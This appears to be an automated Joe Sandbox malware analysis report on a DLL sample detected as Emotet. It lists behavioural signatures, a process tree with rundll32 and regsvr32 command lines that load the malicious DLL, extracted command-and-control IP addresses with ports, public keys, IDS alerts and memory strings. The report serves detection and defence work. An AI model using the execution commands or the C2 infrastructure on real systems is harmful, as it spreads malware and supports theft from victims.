Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report YBfn5E3Dlw

Overview

General Information

Sample Name:YBfn5E3Dlw (renamed file extension from none to dll)
Analysis ID:553389
MD5:038f9a9d5b96733a9b3030cfbe4e4535
SHA1:3b8a4b81f0b06514188e4f935d5f4b0858b93806
SHA256:d46762ba155e3345baf5d9e9453e6cd8e0647438693abddf34f98ae8d6bd436a
Tags:32dllexe
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Suspicious Call by Ordinal
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6260 cmdline: loaddll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 2240 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6072 cmdline: rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 4180 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 6500 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Dfktehrjwgeevy\pakqi.bja",rArKTBwXKBsr MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
            • rundll32.exe (PID: 6664 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Dfktehrjwgeevy\pakqi.bja",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 5396 cmdline: regsvr32.exe /s C:\Users\user\Desktop\YBfn5E3Dlw.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • rundll32.exe (PID: 6436 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1320 cmdline: rundll32.exe C:\Users\user\Desktop\YBfn5E3Dlw.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 552 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6888 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5628 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6260 -ip 6260 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 1368 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5416 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7132 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000000.680031217.0000000002AE1000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    0000000B.00000002.687070469.0000000000B50000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000007.00000002.684992268.0000000003450000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000000.00000002.703964616.0000000002AB0000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000007.00000002.687871792.0000000005661000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 27 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.rundll32.exe.59f0000.10.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              7.2.rundll32.exe.5630000.6.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                4.2.rundll32.exe.4720000.4.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  0.2.loaddll32.exe.2ab0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    7.2.rundll32.exe.5690000.8.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 43 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2240, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1, ProcessId: 6072

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 3.2.rundll32.exe.1270000.0.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: YBfn5E3Dlw.dllVirustotal: Detection: 13%Perma Link
                      Source: YBfn5E3Dlw.dllReversingLabs: Detection: 16%
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.685499614.0000000004D25000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685556011.0000000003291000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685774449.0000000003291000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.690025139.00000000050A2000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.690080981.00000000050A5000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690025139.00000000050A2000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.685541913.000000000328C000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.686171794.000000000328C000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000C.00000003.690080981.00000000050A5000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690025139.00000000050A2000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: a,njr/nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000C.00000002.702514723.0000000000C92000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.690074916.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.690074916.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.690074916.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.685885045.0000000003297000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685567908.0000000003297000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685783143.0000000003297000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000C.00000003.690025139.00000000050A2000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.685885045.0000000003297000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685567908.0000000003297000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685783143.0000000003297000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.690074916.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.690074916.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.685556011.0000000003291000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.685774449.0000000003291000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000C.00000003.690087047.00000000050A8000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.690035610.00000000050A8000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.690016082.00000000050D1000.00000004.00000001.sdmp
                      Source: Binary string: Kernel.Appcore.pdb^;V source: WerFault.exe, 0000000C.00000003.690074916.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.685541913.000000000328C000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.686171794.000000000328C000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.4:49790 -> 45.138.98.34:80
                      Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.4:49791 -> 69.16.218.101:8080
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.16.218.101 144Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.138.98.34 80Jump to behavior
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 45.138.98.34:80
                      Source: Malware configuration extractorIPs: 69.16.218.101:8080
                      Source: Malware configuration extractorIPs: 51.210.242.234:8080
                      Source: Malware configuration extractorIPs: 185.148.168.220:8080
                      Source: Malware configuration extractorIPs: 142.4.219.173:8080
                      Source: Malware configuration extractorIPs: 54.38.242.185:443
                      Source: Malware configuration extractorIPs: 191.252.103.16:80
                      Source: Malware configuration extractorIPs: 104.131.62.48:8080
                      Source: Malware configuration extractorIPs: 62.171.178.147:8080
                      Source: Malware configuration extractorIPs: 217.182.143.207:443
                      Source: Malware configuration extractorIPs: 168.197.250.14:80
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 66.42.57.149:443
                      Source: Malware configuration extractorIPs: 210.57.209.142:8080
                      Source: Malware configuration extractorIPs: 159.69.237.188:443
                      Source: Malware configuration extractorIPs: 116.124.128.206:8080
                      Source: Malware configuration extractorIPs: 128.199.192.135:8080
                      Source: Malware configuration extractorIPs: 195.154.146.35:443
                      Source: Malware configuration extractorIPs: 185.148.168.15:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 207.148.81.119:8080
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 190.90.233.66:443
                      Source: Malware configuration extractorIPs: 78.46.73.125:443
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 37.59.209.141:8080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                      Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                      Source: Joe Sandbox ViewIP Address: 104.131.62.48 104.131.62.48
                      Source: global trafficTCP traffic: 192.168.2.4:49791 -> 69.16.218.101:8080
                      Source: unknownNetwork traffic detected: IP country count 12
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.98.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.98.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.98.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: svchost.exe, 00000013.00000003.808009499.000002EBAEF89000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000013.00000003.808009499.000002EBAEF89000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000013.00000003.808009499.000002EBAEF89000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.808025358.000002EBAEF9A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000013.00000003.808009499.000002EBAEF89000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.808025358.000002EBAEF9A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000013.00000002.823886227.000002EBAE6E9000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000013.00000002.823886227.000002EBAE6E9000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.14.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: svchost.exe, 00000013.00000003.797831487.000002EBAEF82000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
